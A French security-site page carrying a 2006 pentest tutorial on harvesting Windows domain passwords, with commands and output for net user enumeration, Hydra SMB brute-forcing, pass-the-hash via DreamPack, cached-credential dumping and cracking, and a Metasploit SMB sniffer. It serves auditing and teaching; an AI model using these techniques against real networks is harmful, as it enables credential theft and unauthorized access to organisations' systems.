Contribuez à SecuObs en envoyant des bitcoins ou des dogecoins.
Nouveaux articles (fr): 1pwnthhW21zdnQ5WucjmnF3pk9puT5fDF
Amélioration du site: 1hckU85orcGCm8A9hk67391LCy4ECGJca

Contribute to SecuObs by sending bitcoins or dogecoins.

Chercher :
Newsletter :  


Revues :
- Presse
- Presse FR
- Vidéos
- Twitter
- Secuobs





Sommaires :
- Tendances
- Failles
- Virus
- Concours
- Reportages
- Acteurs
- Outils
- Breves
- Infrastructures
- Livres
- Tutoriels
- Interviews
- Podcasts
- Communiques
- USBsploit
- Commentaires


Revue Presse:
- Tous
- Francophone
- Par mot clé
- Par site
- Le tagwall


Top bi-hebdo:
- Ensemble
- Articles
- Revue
- Videos
- Twitter
- Auteurs


Articles :
- Par mot clé
- Par auteur
- Par organisme
- Le tagwall


Videos :
- Toutes
- Par mot clé
- Par site
- Le tagwall


Twitter :
- Tous
- Par mot clé
- Par compte
- Le tagwall


Commentaires :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS/XML :
- Articles
- Commentaires
- Revue
- Revue FR
- Videos
- Twitter


RSS SecuObs :
- sécurité
- exploit
- windows
- attaque
- outil
- microsoft


RSS Revue :
- security
- microsoft
- windows
- hacker
- attack
- network


RSS Videos :
- curit
- security
- biomet
- metasploit
- biometric
- cking


RSS Twitter :
- security
- linux
- botnet
- attack
- metasploit
- cisco


RSS Comments :
- Breves
- Virus
- Failles
- Outils
- Tutoriels
- Tendances
- Acteurs
- Reportages
- Infrastructures
- Interviews
- Concours
- Livres
- Communiques


RSS OPML :
- Français
- International











Revue de presse francophone :
- Appaloosa AppDome nouent un partenariat pour accompagner les entreprises dans le déploiement et la protection des applications mobiles
- D-Link offre une avec un routeur VPN sans fil AC
- 19 mai Paris Petit-Déjeuner Coreye Développer son business à l'abri des cyberattaques
- POYNTING PRESENTE LA NOUVELLE ANTENNE OMNI-291, SPECIALE MILIEU MARITIME, CÔTIER ET MILIEU HUMIDE
- Flexera Software Les utilisateurs français de PC progressent dans l'application de correctifs logiciels, mais des défis de tailles subsistent
- Riverbed lance SD-WAN basé sur le cloud
- Fujitsu multi-récompensé VMware lui décerne plusieurs Partner Innovation Awards à l'occasion du Partner Leadership Summit
- Zscaler Private Access sécuriser l'accès à distance en supprimant les risques inhérents aux réseaux privés virtuels
- QNAP annonce la sortie de QTS 4.2.1
- Une enquête réalisée par la société de cyber sécurité F-Secure a décelé des milliers de vulnérabilités graves, potentiellement utilisables par des cyber criminels pour infiltrer l'infrastru
- Trouver le juste équilibre entre une infrastructure dédiée et cloud le dilemme de la distribution numérique
- 3 juin - Fleurance - Cybersécurité Territoires
- Cyber-assurances Seules 40 pourcents des entreprises françaises sont couvertes contre les violations de sécurité et les pertes de données
- Des étudiants de l'ESIEA inventent CheckMyHTTPS un logiciel qui vérifie que vos connexions WEB sécurisées ne sont pas interceptées
- Les produits OmniSwitch d'Alcatel-Lucent Enterprise ALE gagnent en sécurité pour lutter contre les cyber-attaques modernes

Dernier articles de SecuObs :
- DIP, solution de partage d'informations automatisée
- Sqreen, protection applicative intelligente de nouvelle génération
- Renaud Bidou (Deny All): "L'innovation dans le domaine des WAFs s'oriente vers plus de bon sens et d'intelligence, plus de flexibilité et plus d'ergonomie"
- Mises à jour en perspective pour le système Vigik
- Les russes ont-ils pwn le système AEGIS ?
- Le ministère de l'intérieur censure une conférence au Canada
- Saut d'air gap, audit de firmware et (in)sécurité mobile au programme de Cansecwest 2014
- GCHQ: Le JTRIG torpille Anonymous qui torpille le JTRIG (ou pas)
- #FIC2014: Entrée en territoire inconnu
- Le Sénat investit dans les monnaies virtuelles

Revue de presse internationale :
- VEHICLE CYBERSECURITY DOT and Industry Have Efforts Under Way, but DOT Needs to Define Its Role in Responding to a Real-world Attack
- Demand letter served on poll body over disastrous Comeleak breach
- The Minimin Aims To Be The Simplest Theremin
- Hacking group PLATINUM used Windows own patching system against it
- Hacker With Victims in 100 Nations Gets 7 Years in Prison
- HPR2018 How to make Komboucha Tea
- Circuit Bender Artist bends Fresnel Lens for Art
- FBI Director Suggests iPhone Hacking Method May Remain Secret
- 2016 Hack Miami Conference May 13-15, 2016
- 8-bit Video Wall Made From 160 Gaming Keyboards
- In An Era Of Decline, News Sites Can t Afford Poor Web Performance
- BeautifulPeople.com experiences data breach 1m affected
- Swedish Air Space Infringed, Aircraft Not Required
- Why cybercriminals attack healthcare more than any other industry
- Setting the Benchmark in the Network Security Forensics Industry

Annuaire des videos
- FUZZING ON LINE PART THREE
- Official Maltego tutorial 5 Writing your own transforms
- Official Maltego tutorial 6 Integrating with SQL DBs
- Official Maltego tutorial 3 Importing CSVs spreadsheets
- install zeus botnet
- Eloy Magalhaes
- Official Maltego tutorial 1 Google s websites
- Official Maltego tutorial 4 Social Networks
- Blind String SQL Injection
- backdoor linux root from r57 php shell VPS khg crew redc00de
- How To Attaque Pc With Back Track 5 In Arabique
- RSA Todd Schomburg talks about Roundup Ready lines available in 2013
- Nessus Diagnostics Troubleshooting
- Panda Security Vidcast Panda GateDefender Performa Parte 2 de 2
- MultiPyInjector Shellcode Injection

Revue Twitter
- RT @fpalumbo: Cisco consistently leading the way ? buys vCider to boost its distributed cloud vision #CiscoONE
- @mckeay Looks odd... not much to go on (prob some slideshow/vid app under Linux)
- [SuggestedReading] Using the HTML5 Fullscreen API for Phishing Attacks
- RT @BrianHonan: Our problems are not technical but cultural. OWASP top 10 has not changed over the years @joshcorman #RSAC
- RT @mikko: Wow. Apple kernels actually have a function called PE_i_can_has_debugger:
- [Blog Spam] Metasploit and PowerShell payloads
- PinkiePie Strikes Again, Compromises Google Chrome in Pwnium Contest at Hack in the Box: For the second time thi...
- @mikko @fslabs y'all wldn't happen to have lat/long data sets for other botnets, wld you? Doing some research (free/open info rls when done)
- RT @nickhacks: Want to crash a remote host running Snow Leopard? Just use: nmap -P0 -6 --script=targets-ipv6-multicast-mld #wishiwaskidding
- An inexpensive proxy service called is actually a front for #malware distribution -

Mini-Tagwall
Revue de presse : security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone

+ de mots clés pour la revue de presse

Annuaires des videos : curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit

+ de mots clés pour les videos

Revue Twitter : security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall

+ de mots clés pour la revue Twitter

Top bi-hebdo des articles de SecuObs
- [Ettercap – Partie 2] Ettercap par l'exemple - Man In the Middle et SSL sniffing
- [Infratech - release] version 0.6 de Bluetooth Stack Smasher
- [IDS Snort Windows – Partie 2] Installation et configuration
- [Infratech - vulnérabilité] Nouvelle version 0.8 de Bluetooth Stack Smasher
- Mises à jour en perspective pour le système Vigik
- USBDumper 2 nouvelle version nouvelles fonctions !
- EFIPW récupère automatiquement le mot de passe BIOS EFI des Macbook Pro avec processeurs Intel
- La sécurité des clés USB mise à mal par USBDUMPER
- Une faille critique de Firefox expose les utilisateurs de Tor Browser Bundle
- Installation sécurisée d'Apache Openssl, Php4, Mysql, Mod_ssl, Mod_rewrite, Mod_perl , Mod_security

Top bi-hebdo de la revue de presse
- StackScrambler and the Tale of a Packet Parsing Bug

Top bi-hebdo de l'annuaire des videos
- DC++ Botnet. How To DDos A Hub With Fake IPs.
- Comment creer un server botnet!!!!(Réseau de pc zombies)
- Defcon 14 Hard Drive Recovery Part 3

Top bi-hebdo de la revue Twitter
- RT @secureideas: I believe that all the XSS flaws announced are fixed in CVS. Will test again tomorrow if so, release 1.4.3. #BASESnort
- Currently, we do not support 100% of the advanced PDF features found in Adobe Reader... At least that's a good idea.
- VPN (google): German Foreign Office Selects Orange Business for Terrestrial Wide: Full
- @DisK0nn3cT Not really, mostly permission issues/info leak...they've had a couple of XSS vulns but nothing direct.
- Swatting phreaker swatted and heading to jail: A 19-year-old American has been sentenced to eleven years in pris..
- RT @fjserna You are not a true hacker if the calc.exe payload is not the scientific one... infosuck.org/0x0035.png

Top des articles les plus commentés
- [Metasploit 2.x – Partie 1] Introduction et présentation
- Microsoft !Exploitable un nouvel outil gratuit pour aider les développeurs à évaluer automatiquement les risques
- Webshag, un outil d'audit de serveur web
- Les navigateurs internet, des mini-systèmes d’exploitation hors de contrôle ?
- Yellowsn0w un utilitaire de déblocage SIM pour le firmware 2.2 des Iphone 3G
- CAINE un Live[CD|USB] pour faciliter la recherche légale de preuves numériques de compromission
- Nessus 4.0 placé sous le signe de la performance, de l'unification et de la personnalisation
- [Renforcement des fonctions de sécurité du noyau Linux – Partie 1] Présentation
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- Origami pour forger, analyser et manipuler des fichiers PDF malicieux

Tutoriels

English version with Google Translate

[Auditer son réseau Windows - partie 4] Pratique : La chasse au mot de passe (2/2)

Par Nicolas Ruff, EADS/CCR DCR/STI/C
Le 25/08/2006


Résumé : Récupérer les commentaires des comptes de domaine, enumérer les comptes utilisateur, fouiller les partages réseau, les mots de passe triviaux, les cas difficiles, le cache d'authentification Windows, demander une authentification et l'attaquer via le réseau, installer un Keylogger, ingénierie sociale. - Lire l'article



Pour certains comptes, en particulier les comptes applicatifs dont le mot de passe est difficilement changeable, il est fréquent que le mot de passe soit documenté dans les propriétés du compte utilisateur !


Récupérer les commentaires des comptes de domaine

La commande NET USER fournit des informations très détaillées, malheureusement elle ne permet pas d'extraire en une seule fois l'ensemble des commentaires.

C:\>net user /domain
The request will be processed at a domain controller for domain win2k.local.

User accounts for \\mortsubite.win2k.local
---------------------------------------------------------------------------
Administrateur Invité IUSR_MORTSUBITE
IWAM_MORTSUBITE krbtgt testuser
user
The command completed successfully.

C:\>net user testuser /domain
The request will be processed at a domain controller for domain win2k.local.

User name testuser
Full Name Test User
Comment ne pas changer le mdp de ce compte (toto)
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/20/2006 6:31 PM
Password expires Never
Password changeable 6/20/2006 6:31 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/27/2006 12:32 PM

Logon hours allowed All

Local Group Memberships
Global Group memberships *Utilisa. du domaine
The command completed successfully.



Il est parfois plus agréable d'utiliser l'outil Cain, qui affiche l'ensemble des informations utiles sous forme de tableau.



Fig. 3 Enumérer les comptes utilisateur avec Cain



Fouiller les partages réseau

Une mauvaise pratique bien connue consiste à noter ses mots de passe, sur un post-it™ ou dans un fichier. Lorsque le fichier se trouve sur un partage réseau, et que la permission par défaut autorise la lecture à des groupes trop larges, c'est bien souvent le drame.


Récupérer les listes de mots de passe

1.Identifier tous les partages réseau, y compris les partages "cachés".

Les partages dont le nom se termine par '$' ne sont pas visibles dans l'interface Windows. Toutefois ce mécanisme n'offre aucune sécurité. Là encore l'outil Cain (et bien d'autres) peuvent énumérer l'ensemble des partages disponibles sur une machine.



Fig. 4 Les partages vus depuis Windows




Fig. 5 Les partages vus depuis Cain



2.Lister les utilisateurs et groupes ayant accès à des partages "intéressants".

Il existe un outil (payant) particulièrement adapté à cette tâche : SecurityExplorer ( lien ).

3.Rechercher tous les fichiers dont le nom contient "pass" ou "pwd" (par exemple).


On remarque qu'existe d'autres fichiers susceptibles de contenir des informations intéressantes, tels que les scripts d'installation, les fichiers journaux, les fichiers de sauvegarde, etc.


Essayer quelques mots de passe triviaux

Une légende prétend que les mots de passe les plus utilisés dans les pays anglo-saxons sont "god", "sex" et "password".

De mon expérience, les mots de passe les plus utilisés en France sont :

- Mot de passe vide
- Mot de passe = nom du compte (ou nom du compte à l'envers)
- "1234"
- "soleil"
- "vacances"

Lorsqu'aucune stratégie de verrouillage de compte n'est en place, ou lorsque le compteur de verrouillage est automatiquement réinitialisé au bout de X minutes (ex. 30 minutes par défaut sous Windows), essayer quelques mots de passe sur la totalité des comptes utilisateur peut s'avérer payant.


Vérifier la stratégie de verrouillage de compte dans un domaine

C:\>net accounts /domain
La demande sera traitée sur contrôleur de domaine du domaine win2k.local.

Fermeture forcée de la session après expiration ? : Jamais
Durée de vie minimale du mot de passe (jours) : 0
Durée de vie maximale du mot de passe (jours) : 42
Longueur minimale du mot de passe : 0
Nombre de mots de passe antérieurs à conserver : 1
Seuil de verrouillage : Jamais
Durée du verrouillage (min) : 30
Fenêtre d'observation du verrouillage (min) : 30
Rôle de l'ordinateur : PRINCIPAL
La commande s'est terminée correctement.



Il peut être également intéressant de regarder les comptes marqués comme ne s'étant jamais connectés. Bien souvent, il existe un "mot de passe par défaut" unique dans l'entreprise …

A mon sens, il n'existe pas de "bon" outil public permettant le bruteforce de mots de passe Windows à distance – Hydra peut toutefois faire l'affaire.


Bruteforcer à distance les mots de passe de domaine avec Hydra

Créer un fichier USERS.TXT contenant tous les utilisateurs du domaine (sans les comptes d'ordinateur, dont le nom se termine par '$').

Créer un fichier PASSWORDS.TXT contenant une liste de mots de passe courants.

Ne pas oublier "-e ns" pour tester également le mot de passe vide et le mot de passe égal au nom du compte.

slax # hydra -L users.txt -P passwords.txt -e ns 172.16.21.80 smb

[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes.
Hydra (lien starting at 2006-06-25 11:56:46
[DATA] 1 tasks, 1 servers, 45 login tries (l:5/p:9), ~45 tries per task
[DATA] attacking service smb on port 139
[139][smb] host: 172.16.21.80 login: user password: toto
[139][smb] host: 172.16.21.80 login: jdoe password: soleil
[STATUS] attack finished for 172.16.21.80 (waiting for childs to finish)
Hydra (lien finished at 2006-06-25 11:56:48



Les cas difficiles

Dans certains cas (rares !), il peut s'avérer vraiment difficile de collecter des mots de passe par les méthodes "standards". Dans ce cas, voici quelques idées, l'essentiel étant encore une fois de rester créatif !


Utiliser le hash plutôt que le mot de passe

Dans le cas où un mot de passe s'avère particulièrement long à cracker, il faut savoir qu'il est possible de se loguer en utilisant directement le hash (LM ou NTLM) !

En effet d'un point de vue Windows le secret est bien le hash du mot de passe et non pas le mot de passe en lui-même.

Pendant longtemps cette attaque est restée théorique (les implémentations de type SMBPROXY lien ou patch SAMBA lien restant largement expérimentales), mais il existe aujourd'hui une implémentation 100% fonctionnelle sous Windows : DreamPack ( lien ).


Préparer un poste avec DreamPack

1.Télécharger l'exécutable DreamPack, l'exécuter en tant qu'Administrateur local, cliquer sur "install", redémarrer la machine.

2.Dans la fenêtre de login, taper "dreamon" pour faire apparaître le menu caché.

3.Cliquer sur l'image en haut du menu caché pour faire apparaître les options.

4.Choisir l'option "Passwords > Logon with given hash".

5.A l'invite de commande, entrer n'importe quel mot de passe.

6.Dans la fenêtre "Logon with given hash" qui apparaît, renseigner les hash réels (note : il est possible d'utiliser le bureau SYSTEM pour faire du copier/coller, grâce au menu "desktops").


Cette attaque ne fonctionne qu'avec les comptes locaux (pour le moment).


Le cache d'authentification Windows

Par défaut, une machine Windows appartenant à un domaine mémorise les 10 dernières ouvertures de session. Il existe désormais des outils du domaine public permettant de récupérer ce cache et de casser les hash qui s'y trouvent : CacheBF ( lien ) et CacheDump ( lien ).

Attention, cette attaque est considérablement plus longue qu'un cassage de hash LM ou même NTLM !


Casser les mots de passe en cache

C:\TEMP\cachedump-1.2beta>cachedump
administrateur:513A0659D4EDEB49397D1A6408B0D719:
win2k:
user:83F88B76434E3D110846A61162B60478:win2k:

C:\TEMP\cachedump-1.2beta>cachedump > cache.txt

C:\TEMP>cd ..\cachebf-v0.64

C:\TEMP\cachebf-v0.64>cachebf

cachebf v0.6.4, (C)2005 orm@toolcrypt.org
-----------------------------------------

usage: cachebf [infile] [outfile] [complexity] [{}|maxlen] [{}|'resume']

Where complexity is a number in [1..7] or a file name (for dictionary mode)
[file] read words from file
- read words from stdin
1 numbers
2 lowercase letters
3 uppercase letters
4 numbers + lowercase letters (default)
5 numbers + uppercase letters
6 numbers + letters
7 printables

0 < maxlen < 20 (always 19 in dictionary mode)

Resume tries to restore a previous session (no effect in dictionary mode)

Input file format:
name:hash
name:hash
...

Where hash is either an NT4 (nt+lm) or W2k+ (nt) CachedLogonCount hash.
Only the nt hashes are tested by this version of cachebf, so passwords are
case sensitive.

C:\TEMP\cachebf-v0.64>cachebf ..\cachedump-1.2beta\cache.txt outfile.txt 2

cachebf v0.6.4, (C)2005 orm@toolcrypt.org
-----------------------------------------

input file: 2 lines read
checking against cachebf.dat... no .dat file
trying empty password... 0 matches found
trying password = username... 0 matches found
starting bf mode: complexity 2, max password length 19...
q=quit, h=help, s=stats, v=view cracked passwords
all passwords are cracked. press any key to exit

C:\TEMP\cachebf-v0.64>type outfile.txt
user:toto
administrateur:admin



Demander une authentification

Lors de toute connexion vers une machine distante, Windows va d'abord tenter de s'authentifier avec les credentials de l'utilisateur courant (c'est la magie du SSO).

Il existe un module Metasploit permettant de simuler un service distant et de récupérer la tentative d'authentification : le module smb_sniffer. Attention : il est totalement impossible d'exécuter ce module sur une machine Windows, les ports utilisés étant toujours ouverts par Windows.

Le cassage de mot de passe peut s'effectuer avec LCP. Il est également possible d'utiliser une machine Windows sur laquelle tout le trafic est enregistré avec Ethereal. La trace PCAP peut ensuite être ouverte dans Cain pour cassage de mot de passe.

Le temps de cassage dépend du niveau d'authentification négocié entre le client et le serveur (challenge/response LM, NTLM ou NTLMv2).

Reste à forcer la connexion du client … En pratique les possibilités sont infinies : placer un raccourci dans un partage réseau (toute personne allant sur le partage va automatiquement rafraichir le raccourci), envoyer un lien par email, etc.

A noter que toute application capable d'ouvrir un fichier est susceptible de se connecter à une ressource réseau, l'API CreateFile() acceptant aussi bien les syntaxes "C:\fichier" que "\\ressource\fichier". Ceci ouvre de nombreuses possibilités qui feront peut-être l'objet d'un futur tutoriel.


Attaquer une authentification réseau

slax framework-2.6 # ./msfconsole

...

+ -- --=[ msfconsole v2.6 [143 exploits - 75 payloads]

msf > use smb_sniffer

msf smb_sniffer > show options

Exploit Options
===============
Exploit: Name Default Description
-------- ------- ------------ ---------------------------------
optional LOGFILE smbsniff.log The path for the optional log file
required HOST 0.0.0.0 The IP address to bind the SMB service to
optional UID 0 The user ID to switch to after opening the port
required LPORT 139 The SMB server port

Target: Targetless Exploit

msf smb_sniffer > exploit

[*] Listener created, switching to userid 0
[*] Starting SMB Password Service
[*] New connection from 172.16.21.134
Thu Jun 26 10:11:49 2006 172.16.21.134 user WIN2K 414
141414141414195c3d5c0f7f0f6a8b8e3d81ee440f37177e
f4552cd3f3bb213b8b929037f68661ad77867e0c97382028
84c9a84b197a2 Windows 2002 2600 Service Pack 1 Windows 2002 5.1 ShortLM
^C

slax framework-2.6 # cat smbsniff.log

Thu Jun 26 10:11:49 2006 172.16.21.134 user WIN2K 4141
41414141414195c3d5c0f7f0f6a8b8e3d81ee440f37177ef
4552cd3f3bb213b8b929037f68661ad77867e0c973820288
4c9a84b197a2 Windows 2002 2600 Service Pack 1 Windows 2002 5.1 ShortLM



Si la réponse LM est présente (c'est le cas ici), remettre en forme le fichier dans le format suivant :

slax framework-2.6 # cat smbsniff.log

user:3:4141414141414141:95c3d5c0f7f0f6a8b8e3d81e
e440f37177ef4552cd3f3bb2:13b8b929037f68661ad7786
7e0c9738202884c9a84b197a2



Si seule la réponse NTLM est présente, remettre en forme le fichier dans le format suivant :

slax framework-2.6 # cat smbsniff.log

user:3:4141414141414141:NO PASSWORD:13b8b929037f
68661ad77867e0c9738202884c9a84b197a2



Dans LCP, faire :

"Import > Import from sniff file".
"Session > Audit LM challenge/response" ou "Session > Audit NT challenge/response" selon la réponse du client.
"Session > Begin audit (F4)".


Attention : l'audit d'une réponse NTLM est considérablement plus long que celui d'une réponse LM !


Installer un Keylogger

Je ne m'étendrai pas sur le sujet des keyloggers, car leur utilisation reste assez dangereuse (y compris d'un point de vue légal). On peut toutefois noter que DreamPack possède un module "Logon Logger", qui permet de piéger une machine.


Ingénierie sociale

Cette approche est très délicate, mais en général très efficace. Elle peut prendre des formes variées (envoi d'un email avec pièce jointe ou lien vers un site "hostile", appel téléphonique, etc.). L'utilisation d'AJAX permet la réalisation de sites piégés très efficaces.

La variante la plus amusante consiste à jeter des clés USB dans le parking de la société. Il est avéré ( lien ) que la majorité des utilisateurs vont ramasser la clé, la brancher sur leur PC, et lire son contenu.

Autres ressources dans ce même dossier :

[Auditer son réseau Windows - partie 1] Démystifier le Pentesting - lien

[Auditer son réseau Windows - partie 2] Pratique : Obtenir les droits d'administrateur local - lien

[Auditer son réseau Windows - partie 3] Pratique : La chasse au mot de passe (1/2)-
lien

[Auditer son réseau Windows - partie 5] Conclusion : Une moyenne avant contrôle total du domaine Windows de 20 minutes - lien


Les mots clés pour les articles publiés sur SecuObs : réseau windows
Les articles de la revue de presse sur les mots clés : windows
Les videos sur SecuObs pour les mots clés : windows
Les éléments de la revue Twitter pour les mots clés : windows
Voir tous les articles de "Nicolas Ruff" publiés sur SecuObs (9 résultats)
Voir tous les articles publiés par l'organisme "EADS/CCR DCR/STI/C" sur SecuObs (5 résultats)


- Article suivant : [Auditer son réseau Windows - partie 5] Conclusion : Une moyenne avant contrôle total du domaine Windows de 20 minutes
- Article précédent : [Auditer son réseau Windows - partie 3] Pratique : La chasse au mot de passe (1/2)
- Article suivant dans la catégorie Tutoriels : [Auditer son réseau Windows - partie 5] Conclusion : Une moyenne avant contrôle total du domaine Windows de 20 minutes
- Article précédent dans la catégorie Tutoriels : [Auditer son réseau Windows - partie 3] Pratique : La chasse au mot de passe (1/2)


Les derniers commentaires de la catégorie Tutoriels:
- UPDATE Snort 2.9.1.1 ...
- Apache Issues Patch To Stop Reverse-Proxy Bypass Attack ...
- ESRT @HackerTheDude @r0bertmart1nez @xanda @morenops - Kernel hacking the BSD way, new post ...
- ESRT @room362 - The Dirty Little Secrets They Didn't Teach You In Pentesting Class ...
- ESRT @jcran @dkarg - Metasploit Payloads VS Libemu - Alienvault Labs ...

Les derniers articles de la catégorie Tutoriels :
- PktAnon un framework pour l anonymat des traces PCAP
- [NessusWX – Partie 2] Audits et conclusion
- [NessusWX – Partie 1] Introduction, installation et configuration
- [IDS Snort Windows – Partie 4] Conclusion et webographie
- [IDS Snort Windows – Partie 3] Exemple de fichier de configuration
- [IDS Snort Windows – Partie 2] Installation et configuration
- [IDS Snort Windows – Partie 1] Introduction aux IDS et à SNORT
- [Sécurité et PHP - Partie 5] Astuces
- [Sécurité et PHP - Partie 4] Remote PHP Vulnerabilty Scanner
- [Sécurité et PHP - Partie 3] Les failles PHP




SecuToolBox :

Mini-Tagwall des articles publiés sur SecuObs :

Mini-Tagwall de l'annuaire video :

Mini-Tagwall des articles de la revue de presse :

Mini-Tagwall des Tweets de la revue Twitter :